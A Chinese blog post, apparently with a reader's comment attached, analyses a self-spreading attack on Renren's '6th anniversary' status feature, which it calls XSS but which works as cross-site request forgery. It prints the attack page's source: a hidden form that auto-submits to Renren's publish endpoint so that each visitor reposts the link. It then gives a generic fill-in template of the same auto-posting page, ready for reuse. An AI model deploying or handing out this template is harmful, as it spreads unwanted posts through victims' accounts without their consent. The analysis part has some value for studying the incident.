通过‘人人网6周年’活动发布的XSS分析
大约半年前,人人弄出国站内信”暗恋门”XSS的漏洞,盗取cookies,病毒分发站内信,曾有童鞋撰文分析过这个事件。(传送门)
今天,满屏的姜姝君(没截图,人人自己公关删太快了)和后来的技术宅改变世界的状态都是这次XSS的具体体现
表现在,点击URL以后,立马也会发一个同样状态,LZ也有中招,翻看技术宅改变世界http://www.wix.com/active93/active93)的源代码
可以在header中看到
<script type="text/javascript">
//<![CDATA[
var serviceTopology = {"serverName":"apu1.wixpress.com","cacheKillerVersion":"v=527","staticServerUrl":"http://static.wix.com","biServerUrl":"http://frog.wix.com","userServerUrl":"http://users.wix.com","billingServerUrl":"http://premium.wix.com","mediaRootUrl":"http://0.static.wix.com","htmlComponentServerUrl":"http://www.flashquix.com/embeds","logServerUrl":"http://frog.wix.com/plebs","monitoringServerUrl":"http://TODO"};
...
//]]>
</script>
实际调用了http://www.flashquix.com/embeds/e50c529dd937433ca83f67a8d4c8291a?wrap=no&gzip=true&bg=transparent
这个js,别直接点开,否者就会执行这个js了 =。=
chrome里打开view-source:http://www.flashquix.com/embeds/e50c529dd937433ca83f67a8d4c8291a?wrap=no&gzip=true&bg=transparent
(或者其他你喜欢的浏览器替换view-source:部分)
安全查看这个js的源码
发现
<html>
<head>
<title></title>
<style type="text/css">
html, body {
height: 100%;
}
body {
margin: 0;
padding: 0;
}
</style>
</head>
<body bgcolor="transparent">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Thanks for you click.</title>
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
This is the TRUTH. Just major in COMPUTER SCIENCE!!!
<div id="kokia" style="float:left;display:none;">
<form id="akiko" name="akiko" action="http://6.renren.com/sixyears/publish" method="POST" target="destination">
<p>type: <input type="text" name="type" value="2"/></p>
<p>raw: <input type="text" name="raw" value="技术宅改变世界。。。http://www.wix.com/active93/active93"/></p>
<input type="submit" value="Submit" />
</form>
</form>
</div>
<script>
document.akiko.submit();
</script>
<script type="text/javascript">var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3F278a7f54490f000cde62d2dbfed2f0b7' type='text/javascript'%3E%3C/script%3E"));</script>
</body>
</html>
</body>
</html>
主要内容就是这个post了,额,人人在post时候没有检查post来源,应该就是这次XSS的主要原因。
这次似乎没有窃取cookies,一点见解,大牛勿拍
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>你需要的html标题</title> </head> <body> <iframe name="destination" width="0" height="0"></iframe> <h2>内容标题啊</h2> <p>内容啊</p> <div id="kokia" style="float:left;display:none;"> <form id="akiko" name="akiko" action="http://6.renren.com/sixyears/publish" method="POST" target="destination"> <p>type: <input type="text" name="type" value="2"/></p> <p>raw: <input type="text" name="raw" value="状态内容,记得加上本URL哦,亲 "/></p> <input type="submit" value="Submit" /> </form> </div> <script> document.akiko.submit(); </script> <!--来个图片神马的--> <image src="imageURL"></image> </body> </html>
刚刚写了篇一样的文章,我的人人上也都是这种转发~